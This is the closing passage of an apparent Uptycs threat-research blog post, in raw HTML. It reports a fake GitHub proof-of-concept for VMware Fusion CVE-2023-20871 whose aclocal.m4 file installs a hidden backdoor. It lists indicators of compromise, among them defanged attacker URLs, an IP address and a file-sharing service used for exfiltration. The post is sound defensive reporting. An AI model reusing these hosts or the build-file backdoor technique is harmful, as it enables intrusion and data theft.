<p>The Uptycs team has seen this modus operandi <a href="https://thehackernews.com/2023/06/fake-researcher-profiles-spread-malware.html" rel="noopener" target="_blank">earlier</a>; spreading malware through a malicious PoC is not new. The same profile, ChriSander22, is circulating another bogus PoC, this one for VMware Fusion CVE-2023-20871. Its contents are the same as those of the fake CVE-2023-35829 PoC, with the same <span style="font-family: 'Courier New', Courier, monospace;">aclocal.m4</span> triggering installation of the hidden backdoor. Both of ChriSander22’s other repositories are down, but we cannot confirm whether GitHub or the profile owner took them down.</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=531&amp;height=682&amp;name=Figure%2014-1.png" alt="Figure 14 – Directory of phony CVE-2023-20871 PoC" width="531" height="682" loading="lazy" style="height: auto; max-width: 100%; width: 531px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=266&amp;height=341&amp;name=Figure%2014-1.png 266w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=531&amp;height=682&amp;name=Figure%2014-1.png 531w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=797&amp;height=1023&amp;name=Figure%2014-1.png 797w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=1062&amp;height=1364&amp;name=Figure%2014-1.png 1062w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=1328&amp;height=1705&amp;name=Figure%2014-1.png 1328w, https://www.uptycs.com/hs-fs/hubfs/Figure%2014-1.png?width=1593&amp;height=2046&amp;name=Figure%2014-1.png 1593w" sizes="(max-width: 531px) 100vw, 531px"><em><span style="font-size: 14px;">Figure 14 – Directory of phony CVE-2023-20871 PoC</span></em></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=1817&amp;height=840&amp;name=Figure%2015-1.png" alt="Figure 15 – Github profile page of fake PoC" width="1817" height="840" loading="lazy" style="height: auto; max-width: 100%; width: 1817px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=909&amp;height=420&amp;name=Figure%2015-1.png 909w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=1817&amp;height=840&amp;name=Figure%2015-1.png 1817w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=2726&amp;height=1260&amp;name=Figure%2015-1.png 2726w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=3634&amp;height=1680&amp;name=Figure%2015-1.png 3634w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=4543&amp;height=2100&amp;name=Figure%2015-1.png 4543w, https://www.uptycs.com/hs-fs/hubfs/Figure%2015-1.png?width=5451&amp;height=2520&amp;name=Figure%2015-1.png 5451w" sizes="(max-width: 1817px) 100vw, 1817px"><em><span style="font-size: 14px;">Figure 15 – Github profile page of fake PoC</span></em></p>
<p>&nbsp;</p>
<p>&nbsp;</p>
<p style="text-align: center;"><img src="https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=1806&amp;height=851&amp;name=Figure%2016-1.png" alt="Figure 16 – Another Github profile page of fake PoCs" width="1806" height="851" loading="lazy" style="height: auto; max-width: 100%; width: 1806px; margin-left: auto; margin-right: auto; display: block;" srcset="https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=903&amp;height=426&amp;name=Figure%2016-1.png 903w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=1806&amp;height=851&amp;name=Figure%2016-1.png 1806w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=2709&amp;height=1277&amp;name=Figure%2016-1.png 2709w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=3612&amp;height=1702&amp;name=Figure%2016-1.png 3612w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=4515&amp;height=2128&amp;name=Figure%2016-1.png 4515w, https://www.uptycs.com/hs-fs/hubfs/Figure%2016-1.png?width=5418&amp;height=2553&amp;name=Figure%2016-1.png 5418w" sizes="(max-width: 1806px) 100vw, 1806px"><em><span style="font-size: 14px;">Figure 16 – Another Github profile page of fake PoCs</span></em></p>
<p>&nbsp;</p>
<h3>IOCs</h3>
<div data-hs-responsive-table="true" style="overflow-x: auto; max-width: 100%; width: 100%; margin-left: auto; margin-right: auto; font-size: 16px;">
<table style="width: 100%; border-collapse: collapse; table-layout: fixed; border: 1px solid #99acc2; height: 69.0625px;">
<tbody>
<tr style="height: 34.0767px;">
<td style="width: 21.0391%; padding: 4px; height: 34px; border-width: 1px; border-style: solid;"><strong>File name</strong></td>
<td style="width: 78.9518%; padding: 4px; height: 34px; border-width: 1px; border-style: solid;"><strong>sha256</strong></td>
</tr>
<tr style="height: 34.0767px;">
<td style="width: 21.0391%; padding: 4px; height: 34px; border-width: 1px; border-style: solid;">aclocal.m4</td>
<td style="width: 78.9518%; padding: 4px; height: 34px; border-width: 1px; border-style: solid;">caa69b10b0bfca561dec90cbd1132b6dcb2c8a44d76a272a0b70b5c64776ff6c</td>
</tr>
</tbody>
</table>
</div>
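<h3>URLs and IP address</h3>
<p><span style="font-family: 'Courier New', Courier, monospace;">hxxp[:]//cunniloss[.]accesscam[.]org</span><br><span style="font-family: 'Courier New', Courier, monospace;">hxxp[:]//transfer[.]sh</span><br><span style="font-family: 'Courier New', Courier, monospace;">IP 81[.]4[.]109[.]16</span></p>
<p>(Note: <span style="font-family: 'Courier New', Courier, monospace;">transfer[.]sh</span> is a public file-sharing service that the script used as its exfiltration channel, so a match on it alone is weaker evidence than a match on the other indicators and should be read alongside the host activity described above.)</p></span>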
            </div>
          </article>
        </div>

      </div> 

    </div>


  </div> 



</div>




<script type="application/ld+json">
{
  "@context": "http://schema.org",
  "@type": "BlogPosting",
  "headline": "PoC Exploit: Fake Proof of Concept with Backdoor Malware",
  "image": "https://www.uptycs.com/hubfs/POC%20door.jpg",
  "author": {
    "@type": "Person",
    "name": ""
  },
  "publisher": {
    "@type": "Organization",
    "name": "Uptycs Inc",
    "logo": {
      "@type": "ImageObject",
      "url": " https://www.uptycs.com/hs-fs/hubfs/Logo-2.png?width=232&height=70&name=Logo-2.png"
    }
  },
  "datePublished": "2023-07-12 12:00:00",
  "dateModified": "1723630842108"
}
</script>




      </main>

      
              
              
            </div>
          </div>



          <!-- End Social Media -->
        </div>


      </div>
      <!-- End Footer Link and Social media  -->
    </div>
  </div>
</div>




</div>

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div><!--end row-->
</div><!--end row-wrapper -->

</div><!--end widget-span -->
</div>
</div>
</div>
 
  
  
  
</footer></div>
      
    </div> 

    


    













 





  
</body></html>